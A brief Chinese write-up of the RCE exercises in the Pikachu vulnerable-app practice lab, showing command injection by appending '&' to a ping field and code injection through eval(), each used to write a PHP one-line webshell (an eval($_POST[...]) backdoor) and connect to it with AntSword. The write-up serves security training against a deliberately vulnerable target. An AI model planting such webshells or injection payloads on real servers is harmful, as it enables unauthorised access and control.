Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
HIT_Weston4 小时前
93、【Ubuntu】【Hugo】搭建私人博客:面包屑(一)
linux·运维·ubuntu
cuijiecheng20185 小时前
Linux下Beyond Compare过期
linux·运维·服务器
喵叔哟5 小时前
20.部署与运维
运维·docker·容器·.net
HIT_Weston5 小时前
92、【Ubuntu】【Hugo】搭建私人博客:侧边导航栏(六)
linux·运维·ubuntu
CodeAllen嵌入式5 小时前
Windows 11 本地安装 WSL 支持 Ubuntu 24.04 完整指南
linux·运维·ubuntu
期待のcode5 小时前
前后端分离项目 Springboot+vue 在云服务器上的部署
服务器·vue.js·spring boot
AI 智能服务5 小时前
第6课__本地工具调用(文件操作)
服务器·人工智能·windows·php
dalerkd8 小时前
忙里偷闲叙-谈谈最近两年
网络·安全·web安全
松涛和鸣8 小时前
49、智能电源箱项目技术栈解析
服务器·c语言·开发语言·http·html·php
牛三金8 小时前
匿踪查询沿革-Private Information Retrieval(PIR)
算法·安全